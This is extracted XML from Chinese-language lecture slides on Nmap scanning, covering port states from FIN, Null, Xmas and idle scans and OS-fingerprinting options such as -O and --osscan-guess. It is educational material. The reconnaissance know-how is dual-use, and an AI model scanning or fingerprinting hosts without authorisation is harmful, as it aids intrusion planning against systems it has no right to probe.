                        <a:t>無法確定該端口是開放的還是被過濾的。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>UDP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>協議，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>FIN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Null</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Xmas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描可能把端口歸入此類。</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5304165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4343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err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>closed|filtered</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>該狀態使用於</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>不能確定端口是關閉的還是被過濾的。它只可能出現在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>IPID Idle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描中。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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55997195"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350" y="64338"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045672" y="83388"/>
            <a:ext cx="8098328" cy="61912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NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695700" y="4574032"/>
            <a:ext cx="4572000" cy="1131079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25766110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952195081"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="58102" y="1266892"/>
          <a:ext cx="8903018" cy="1634570"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1803405">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2160549935"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7099613">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3198533954"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="291505">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b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作業系統</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(OS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>探測  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>see </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Remote OS Detection   https://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>nmap.org/man/zh/man-os-detection.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2057767107"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="291505">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-O(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>啟動</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作業</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>系統檢測</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1"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a:effectLst/>
                        </a:rPr>
                        <a:t>也可以使用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>同時啟動操作進行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>系統檢測</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>版本檢測</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2461284794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617220">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>osscan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-limit</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>指針對指定的目標進行操作系統檢測</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>如果發現一個打開和關閉的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>TCP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>端口時，操作系統檢測會更有效。 採用這個選項，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>只對滿腳這個條件的主機進操作操作系統檢測，這樣可以間隔時間，特別是在使用掃描多個主機時</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-P0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>。選擇項僅在使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-A </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>進入操作系統檢測時啟動使用。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3890937157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="434340">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>osscan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-guess; --fuzzy</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>推測操作系統檢測結果</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>當</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>無法確定所檢測的操作系統時，可能會提供最接近的匹配，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>默認進入這種匹配，使用上記任一個選項項使</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>的推測更有效</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1902494562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87205"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850106" y="87205"/>
            <a:ext cx="8235705" cy="777678"/>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100" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Fingerprinting &amp; Banner Grabbing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4109016825"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="116291" y="3250090"/>
          <a:ext cx="8903018" cy="1972232"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2523731">
                  <a:extLst>
